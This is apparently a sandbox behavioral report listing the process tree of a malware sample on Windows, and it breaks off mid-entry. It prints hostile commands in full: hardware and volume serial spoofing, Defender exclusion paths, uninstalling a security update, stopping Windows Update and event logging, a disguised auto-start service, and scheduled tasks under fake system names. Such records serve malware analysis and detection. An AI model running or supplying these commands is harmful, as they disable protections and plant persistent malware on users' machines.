C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
- Suspicious use of WriteProcessMemory
PID:3672

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25732HP-TRGT20679AB
5⤵
- Executes dropped EXE
PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
- Suspicious use of WriteProcessMemory
PID:4684

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225732HP-TRGT20679RV
5⤵
- Executes dropped EXE
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
- Suspicious use of WriteProcessMemory
PID:2896

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825732HP-TRGT20679SG
5⤵
- Executes dropped EXE
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:3932

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
- Executes dropped EXE
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:4940

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525732HP-TRGT20679SL
5⤵
- Executes dropped EXE
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:4504

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425735HP-TRGT31427FA
5⤵
- Executes dropped EXE
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:1744

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625739HP-TRGT9407FU
5⤵
- Executes dropped EXE
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:3600

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325739HP-TRGT9407DQ
5⤵
- Executes dropped EXE
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:5044

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725739HP-TRGT9407MST
5⤵
- Executes dropped EXE
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:5100

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
- Executes dropped EXE
PID:2208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
PID:4964

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25758HP-TRGT8362AB
5⤵
- Executes dropped EXE
PID:5168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
PID:4076

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225755HP-TRGT30382RV
5⤵
- Executes dropped EXE
PID:5380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
PID:5056

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825758HP-TRGT8362SG
5⤵
- Executes dropped EXE
PID:672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:1728

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
- Executes dropped EXE
PID:4124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:3844

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525758HP-TRGT8362SL
5⤵
- Executes dropped EXE
PID:4504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:5300

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425758HP-TRGT8362FA
5⤵
- Executes dropped EXE
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:5392

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625758HP-TRGT8362FU
5⤵
- Executes dropped EXE
PID:1528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:5612

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325758HP-TRGT8362DQ
5⤵
- Executes dropped EXE
PID:4868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:5692

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725758HP-TRGT8362MST
5⤵
- Executes dropped EXE
PID:2768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:5960

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
- Executes dropped EXE
PID:4788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
PID:5988

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25775HP-TRGT29336AB
5⤵
- Executes dropped EXE
PID:4224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
PID:6116

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225775HP-TRGT29336RV
5⤵
- Executes dropped EXE
PID:1532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
PID:6120

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825775HP-TRGT29336SG
5⤵
- Executes dropped EXE
PID:2260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:5308

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
- Executes dropped EXE
PID:4504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:5456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4124

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525775HP-TRGT29336SL
5⤵
- Executes dropped EXE
PID:3952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:5584

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425775HP-TRGT29336FA
5⤵
- Executes dropped EXE
PID:5388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:5384

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625775HP-TRGT29336FU
5⤵
- Executes dropped EXE
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:3220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5100

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325775HP-TRGT29336DQ
5⤵
- Executes dropped EXE
PID:5792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:5360

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725775HP-TRGT29336MST
5⤵
- Executes dropped EXE
PID:3536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:3844

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
- Executes dropped EXE
PID:5568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 2KIN-5550
4⤵
PID:6132

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 2KIN-5550
5⤵
- Executes dropped EXE
PID:4412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: H34B-PJCG
4⤵
PID:3672

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: H34B-PJCG
5⤵
- Executes dropped EXE
PID:4288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G330-303R
4⤵
PID:4684

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G330-303R
5⤵
- Executes dropped EXE
PID:4736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 1DFZ-9OOO
4⤵
PID:4788

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 1DFZ-9OOO
5⤵
- Executes dropped EXE
PID:2952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: LLUF-5BU0
4⤵
PID:4692

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: LLUF-5BU0
5⤵
- Executes dropped EXE
PID:5920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UIOO-56CJ
4⤵
PID:5768

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UIOO-56CJ
5⤵
- Executes dropped EXE
PID:5812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UT32-TB0M
4⤵
PID:736

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UT32-TB0M
5⤵
- Executes dropped EXE
PID:3272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B9VE-FOIN
4⤵
PID:4448

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B9VE-FOIN
5⤵
- Executes dropped EXE
PID:3292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 6PCA-G7TR
4⤵
PID:1444

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 6PCA-G7TR
5⤵
- Executes dropped EXE
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: JOEK-HIUG
4⤵
PID:5672

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: JOEK-HIUG
5⤵
- Executes dropped EXE
PID:428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: S04T-I9BR
4⤵
PID:5060

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: S04T-I9BR
5⤵
- Executes dropped EXE
PID:5216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: OHJ2-VM0B
4⤵
PID:2160

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: OHJ2-VM0B
5⤵
PID:5684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MO0H-0O95
4⤵
PID:5152

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MO0H-0O95
5⤵
PID:5232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: C556-5M54
4⤵
PID:1532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4504

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: C556-5M54
5⤵
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: Z0VH-ZJHS
4⤵
PID:5620

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: Z0VH-ZJHS
5⤵
PID:5588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 7ZAU-7CKH
4⤵
PID:3928

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 7ZAU-7CKH
5⤵
PID:32

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EPKJ-3SH3
4⤵
PID:1620

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EPKJ-3SH3
5⤵
PID:4540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: J5OC-2CP2
4⤵
PID:1744

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1844

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: J5OC-2CP2
5⤵
PID:5556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 0U86-E2HU
4⤵
PID:5764

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 0U86-E2HU
5⤵
PID:5808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8SPT-0RJF
4⤵
PID:3996

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8SPT-0RJF
5⤵
PID:2268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 60VE-8CTF
4⤵
PID:4896

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 60VE-8CTF
5⤵
PID:2872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 55KZ-G3N2
4⤵
PID:5392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2624

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 55KZ-G3N2
5⤵
PID:5548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: CGDK-H4IZ
4⤵
PID:2140

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: CGDK-H4IZ
5⤵
PID:5248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
4⤵
PID:3636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
4⤵
PID:5604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
4⤵
PID:5316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
4⤵
PID:5600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
4⤵
PID:4024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
4⤵
PID:2824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
4⤵
PID:5144

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:880

C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\System.exe'
5⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'
5⤵
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'
5⤵
PID:3952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'
5⤵
PID:5128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\dllhost.exe'
5⤵
PID:5144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QQqUT9RgSw.bat"
5⤵
PID:5576

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:5224

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:2624

C:\Users\All Users\dllhost.exe
"C:\Users\All Users\dllhost.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5660

C:\Users\Admin\AppData\Roaming\conhostsft.exe
"C:\Users\Admin\AppData\Roaming\conhostsft.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4736

C:\Users\Admin\AppData\Roaming\.conhostsft.exe
"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1468

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
PID:5640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5372

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:5296

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:4896

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:5332

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:5604

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:5652

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:5504

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:5644

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:5276

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:5520

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:5452

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
5⤵
- Launches sc.exe
PID:5228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4304

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
5⤵
- Launches sc.exe
PID:2120

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:4484

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
5⤵
- Launches sc.exe
PID:2084

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536

C:\Windows\system32\schtasks.exe
